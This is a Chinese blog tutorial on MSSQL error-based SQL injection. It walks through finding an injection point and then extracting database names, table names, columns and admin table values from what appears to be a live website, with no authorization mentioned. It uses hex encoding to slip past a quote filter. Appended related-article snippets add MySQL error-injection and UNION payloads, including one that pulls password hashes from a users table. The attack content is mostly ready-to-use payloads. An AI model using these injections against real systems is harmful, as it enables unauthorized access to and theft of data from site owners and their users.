mssql报错注入原理及流程实例

最新推荐文章于 2025-09-24 14:45:18 发布
原创 最新推荐文章于 2025-09-24 14:45:18 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #mysql #sqlserver #mssql #网络安全

本文详细介绍了MSSQL报错注入的原理及其利用方法。通过实例演示如何找到注入点、判断数据类型并获取数据库信息,包括数据库数量、名称、表名、列名以及列值。

mssql报错注入原理及流程实例

mssql 报错注入

1. 原理

  1. 在MSSQL中,数据类型不一样(例如1=‘1’)会报错,并且报错信息会在日志信息中显示出来;日志文件直接在网页上显示

  2. 利用此原理,进行构造 1=‘mssql语句’,返回报错信息

2. mssql 测试实例

2.1 找注入点

  1. sql注入漏洞一般都在输入框,搜索框,域名地址框中
  2. 根据经验,如果域名中有很多编码,一般都不存在sql注入漏洞
    在这里插入图片描述
  3. id=1 and 1=1;id=1 and 1=2 看web页面有无变化,有变化存在漏洞
  4. id=1‘’ and 1=1 --+;id=1’ and 1=2 --+ 看web页面有无变化,有变化存在漏洞

2.2 判断类型

-- 数字型
id=1 and 1=1
id=1 and 1=2   

-- 字符型
id=1' and 1=1 --+
id=1' and 1=2 --+

2.3 获取信息

获取数据库的数量

(select count(*) from master..sysdatabases)>7
-- 大于6不报错,大于7报错,查询到7个数据库

获取数据库名

select substring((select db_name()),1,1)>10
-- 变成了报错注入,得到第一个字母j
-- 同理第二个字母i 
-- 同理第二个字母a
-- 最终得到数据库名 jiaofan

在这里插入图片描述
当我用上述方式查询完成之后,意识到这是报错注入,不用逐字符获取库名。直接利用报错注入的方法

and (select db_name())=1
-- 直接就将整个库名曝出

在这里插入图片描述

获取表名

-- 由于是报错注入,在web页面上可以直接获取到表名
-- 经过不断的测试,在第25行,也就是not in top 24,找到了表sl_admin
-- 经过测试 xtype='U'不行,只能xtype=0x55;
推测后台防火墙将sql中的'过滤了;0x55是U的16进制编码
and 1=(select top 1 name from ST_WebCourse..sysobjects 
where xtype=0x55 and name not in 
(select top 24 name from ST_WebCourse..sysobjects where xtype=0x55))

在这里插入图片描述
在这里插入图片描述

获取列名

and 1=(select top 1 name from jiaofan..syscolumns 
where id=(select id from jiaofan..sysobjects 
where name=0x73006C005F00610064006D0069006E00) 
and name not in (select top 0 name 
from jiaofan..syscolumns where id=(select id 
from jiaofan..sysobjects where name=0x73006C005F00610064006D0069006E00)))

在这里插入图片描述

获取列中的值

select top 1 u1 from sl_admin where u1 not in (select top 0 u1 from sl_admin)
select top 1 u1 from sl_admin where u1 not in (select top 0 u1 from sl_admin)

在这里插入图片描述

在这里插入图片描述

[网络安全自学篇] 十五.Python攻防之多线程、C段扫描和数据库编程(二)
杨秀璋的专栏
10-05 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信,本文将继续分析Python攻防之多线程、C段扫描和数据库编程。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的经验进行讲解。...
Mssql报错注入
ChuMeng1999的博客
10-29 1456
报错信息为Y,说明is_srvrolemember(‘sysadmin’)的值为1,可以断定当前的数据库用户属于管理员组。通过该实验可以让用户掌握常见的mssql报错原理,数据类型转换错误,group by having的报错,掌握mssql中常见的几个系统函数。2.把参数id后面的1替换为@@version,参数ID为整型数据,因为字符串型的数据无法转换成整数型的数据,所以出现了报错现象。@@version表示获取数据库的版本,因为不同版本的数据有略微的差别,所以获取数据的版本信息还是很重要的。
SQL注入漏洞-Mssql报错注入
HacHunter的博客
03-07 2290
Mssql即Sql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
黑客技术入门之sql注入报错分享(mssqlmysql),黑客技术零基础入门到精通实战教程!
最新发布
白帽阿叁的博客
09-24 615
MySQL 溢出类报错注入技术总结 本文介绍了两种MySQL报错注入方法: 溢出类报错 利用大整数溢出:通过~取反操作使数值超出BIGINT范围,配合ABS、EXP、AVG等函数触发报错 双精度溢出:使用EXP、COT等函数使数值超出DOUBLE范围 主键重复报错 利用rand(0)*2产生重复主键值,结合GROUP BY触发Duplicate entry错误 可配合FLOOR、CEILING、FORMAT等函数使用 文章提供了详细的SQL注入示例和错误特征,并列出可用的函数列表,建议使用Burp进行模糊测
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 183
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
sql注入报错注入
weixin_45653478的博客
04-08 1512
报错注入原理基于应用程序在处理数据库查询时产生的错误信息。当应用程序执行一个含有恶意SQL代码的查询时,如果查询出错(例如,由于语法错误或权限不足),数据库系统通常会返回一个错误信息给应用程序。当它的第二个参数不是一个合法的XPath表达式时,会引发错误,并可能返回包含攻击者所需信息的错误消息。在报错注入中,攻击者可能会构造特定的SQL语句,利用floor()函数的特性来触发错误,并从中获取数据库信息。:这也是MySQL的一个XML函数,用于改变(查找并替换)XML文档中符合条件的节点的值。
SQL注入漏洞(MSSQL注入
errorr0
07-05 2797
MSSQL注入的入门讲解
sql注入之堆叠注入
热门推荐
weixin_42566218的博客
02-19 1万+
一、堆叠注入原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
WEB安全之:SQL Server 数据库 SQL 注入
f_carey的博客
06-09 1386
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 SQL Server 数据库1 SQL Server 数据库 SQL 注入基础知识1.1 SQL Server 三个权限级别:1.2 SQL Server 数据库的 6 个默认库1.3 注释符号1.4 SQL Server 注入常用语句及函数1.5 SQL Server 中的 `INFORMATION_SCH.
渗透测试-注入攻击专题
aming小老弟
03-11 4044
sql手工注入 @apache+php+Mysql 正则注入 0x01 Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union sele
SQL Server 2005安装失败十大高频问题汇总:附权威排查流程图解
本文系统梳理了安装失败的典型现象及诊断起点,深入分析操作系统兼容性、.NET Framework依赖、硬件资源配置等前置条件对安装过程的影响,结合Setup Bootstrap日志结构与关键错误码(如1706、1935、29506)解析方法,...
mssql注入过程详解
09-11
mssql注入过程详解,从手工注入到具体实现的过程 很适合初学者
常见sql注入原理详解!
weixin_34396902的博客
11-19 189
1、首先我们创建一个mysqli的链接 /**数据库配置*/ $config = ['hostname'=>"localhost", 'port'=>"3306", 'username'=>"root",'password'=>'','db'=>'sql']; /**接收参数*/ $id = $_GET['id']?$_G...
sql报错注入原理分析
JacobTsang的博客
10-13 1431
研究人员发现,使用group by子句结合rand()函数以及像count(*)这样的聚合函数,在SQL查询时会出现错误,且错误是随机产生的,这就产生了双重查询注入。 到底为什么floor()、rand(0)、count()、group by相结合,会产生这种错误呢?转载以前乌云一位哥的文章: 种子值为0的rand()函数的输出几乎固定为01101 Okay let get is strai...
sql注入报错注入
2401_82760239的博客
04-02 2087
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
关于SQL报错注入原理详细解析
qq_45672254的博客
11-17 829
关于SQL报错注入原理详细解析 之前读过多篇关于Mysql报错注入之floor(rand(0)*2)报错原理探究的文章,都觉得原理阐述大同小异,但在具体细节上,还是不太明白,结合看过的文章和自己的理解,对SQL报错注入原理进行更细致的分析,身为一名网络安全小白,也是想和刚入门的同学一起研究sql注入原理,文章如果有错误的地方,希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接,了解sql报错注入的一般原理Mysql报错注入之floor(rand(0)*2)报错原理探究 在报错原理分析中,主要困惑我的地方
MSSQL显错模式的手工注入实现原理思考和实战
www.i201314.net
09-20 961
说到Mssql手工注入,本人喜欢显错模式的,为啥呢,因为你只要构造一个语句,不用你一个一个特意的去猜,程序会自动告诉你我们要的信息,省时省力,不像不显错模式的盲注,可以让你猜上个半天。进入正题,下面来说说我对显错模式原理的思考。     显错模式,起初也是为了方便程序员修改代码,但是,这正好被我们利用了,我们故意让程序出错来爆出我们要的敏感信息。     上次我说到过having 1=
SQL注入方法-报错注入
acepanhuan的博客
02-11 1259
SQL注入方法-报错注入
Mssql报错注入手注
01-22
### MSSQL 错误注入手动 SQL 注入技术 #### 利用错误信息获取数据库结构 当应用程序未能正确处理异常并显示详细的错误信息时,攻击者可以通过构造特定的SQL查询来触发这些错误,进而推断出数据库的内部结构。例如,在某些情况下,尝试访问不存在的对象会引发有用的错误消息。 ```sql ?id=1' AND (SELECT COUNT(*) FROM non_existent_table) > 0 -- ``` 这种类型的请求可能会导致类似于以下的错误响应: > Invalid object name 'non_existent_table'. 这表明服务器正在运行Microsoft SQL Server,并且能够确认对象名称的有效性[^1]。 #### 枚举系统表和列名 一旦确定目标确实使用的是MS SQL Server,就可以利用已知的系统视图如`sysobjects`, `information_schema.columns`等来进行进一步的信息收集。下面是一个简单的例子用于枚举用户定义表的名字: ```sql ?id=1' UNION ALL SELECT TOP 1 name FROM sysobjects WHERE xtype='U' ORDER BY id DESC-- ``` 上述语句试图附加一个额外的结果集到原始查询上,其中包含了来自`sysobjects`的一个记录——即用户的自定义表之一。如果成功的话,页面可能显示出新的数据行,里面含有某个实际存在的表名[^4]。 对于更深入的数据挖掘,还可以继续探索所选表格的具体字段列表: ```sql ?id=1' UNION ALL SELECT COLUMN_NAME FROM information_schema.columns WHERE table_name = 'discovered_table_name'-- ``` 这里假设已经知道了某张表的确切名字(比如之前通过其他手段得知),那么此命令将会揭示该表内所有的列标题[^5]。 #### 提取敏感数据 最后一步就是读取具体的内容项了。有了前面几步获得的知识基础之后,可以直接指定想要检索的目标列以及它们所属的表单: ```sql ?id=1' UNION ALL SELECT password_hash, user_id FROM users LIMIT 1 OFFSET 0-- ``` 请注意这里的语法取决于具体的DBMS版本和支持特性;此外,为了绕过潜在的安全机制,有时还需要调整分页参数或其他细节设置[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

牛顿编程

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值